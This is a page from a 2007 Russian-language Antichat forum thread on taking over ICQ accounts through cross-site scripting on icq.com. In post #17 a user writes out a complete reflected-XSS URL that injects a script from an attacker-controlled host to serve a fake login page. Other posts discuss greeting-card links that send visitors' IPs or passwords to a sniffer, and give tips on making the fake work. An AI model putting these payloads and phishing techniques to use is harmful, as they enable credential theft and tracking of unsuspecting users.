ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО_OLD > Статьи
Перезагрузить страницу Заходим в Icq через Xss
   
 
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 20.11.2007, 19:49
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию
ы ну да) да всровно кули толку на опере не утянешь, а в осле в основе сидят не просвященные с кривыми девятками, ну если тока пиарить по чатам бородина, ибо там сто пудов придеца юзать осла
 

  #12  
Старый 21.11.2007, 00:50
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
раскрывал тему 2 года назад: http://www.xakep.ru/magazine/xa/083/060/1.asp . Даже конкурс в номере, который мы с Шанкаром прошли, точнее я помог ему пройти на данном тапе, построили по мотивам данной темы. Кроме 9-ок между прочим ничего и не ловится.
 

  #13  
Старый 21.11.2007, 02:50
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315

Репутация: 1228


Отправить сообщение для nc.STRIEM с помощью ICQ
По умолчанию
в файле script.js смысл сначало очищать document.body.innerHTML а потом через document.write() писать, есле можно сразу присвить значение document.body.innerHTML и все)
а так норм.
 

  #14  
Старый 21.11.2007, 03:23
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию
Вторичный до мозга костей метод. Единственная ценность статьи - готовый фейк
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #15  
Старый 21.11.2007, 21:00
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию
Цитата:
Сообщение от PinkPanther  
раскрывал тему 2 года назад: http://www.xakep.ru/magazine/xa/083/060/1.asp . Даже конкурс в номере, который мы с Шанкаром прошли, точнее я помог ему пройти на данном тапе, построили по мотивам данной темы. Кроме 9-ок между прочим ничего и не ловится.
Звеняй, не знал.
Цитата:
Сообщение от Constantine  
Вторичный до мозга костей метод. Единственная ценность статьи - готовый фейк
Да, да, да, но ведь это сайт ICQ.com, такое не часто бывает.
 

  #16  
Старый 02.12.2007, 16:13
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
А вот это:
_http://www.icq.com/greetings/cards/139125/krl5l551/view/

отсылает IP на снифер ачата, оч удуобно, т.к. урл беспалевный и его легче вкрячить, чем вышеописанное
__________________
Карфаген должен быть разрушен...
 

  #17  
Старый 04.12.2007, 00:34
IIAHbI4
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065

Репутация: 1112
Отправить сообщение для IIAHbI4 с помощью ICQ
По умолчанию
хм ... создал диру /karma , туда login.php и script.js поместил, в script.js указал путь
Цитата:
http://xxx/karma.js
, пробую открыть линк у ся в броузере
Цитата:
http://icq.com/people/?people_search=1&searched=1&gender=1;%3C/script%3E%3Cscript%20src=%22http://хххх/karma/script.js%22%3E%3C/script%3E%3Cscript%3E//
чёт грузит, и потом страница пустая =\ мож я чт не так творю?
 

  #18  
Старый 04.12.2007, 01:12
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876

Репутация: 81
По умолчанию
Цитата:
Сообщение от IIAHbI4  
хм ... создал диру /karma , туда login.php и script.js поместил, в script.js указал путь, пробую открыть линк у ся в броузере
чёт грузит, и потом страница пустая =\ мож я чт не так творю?

тоже самое ...
 

  #19  
Старый 04.12.2007, 17:10
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от NOmeR1  
Да, да, да, но ведь это сайт ICQ.com, такое не часто бывает.
согласен с Constantine

пассивные XSS на icq.com, это далеко не чудеса, их там много, как и почти везде

вот допустим это демонстрирует более изящьный метод получения паролей:
[удалил, повесил снифф]

пример взят из статьи hidden`а, сам не стал писать, сразу же скажу для тех кто боится, что ничего там не сохраняется, а выводится на экран
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 05.12.2007 в 06:34..
 

  #20  
Старый 04.12.2007, 22:08
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876

Репутация: 81
По умолчанию
Цитата:
Сообщение от Scipio  
согласен с Constantine

пассивные XSS на icq.com, это далеко не чудеса, их там много, как и почти везде

вот допустим это демонстрирует более изящьный метод получения паролей:
_http://www.icq.com/greetings/cards/145879/sp99l1st/view/

пример взят из статьи hidden`а, сам не стал писать, сразу же скажу для тех кто боится, что ничего там не сохраняется, а выводится на экран
Открытку с чистым php кодом залить не удается, как смогли залить http://www.icq.com/greetings/cards/145879/sp99l1st/view ?
 
 
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ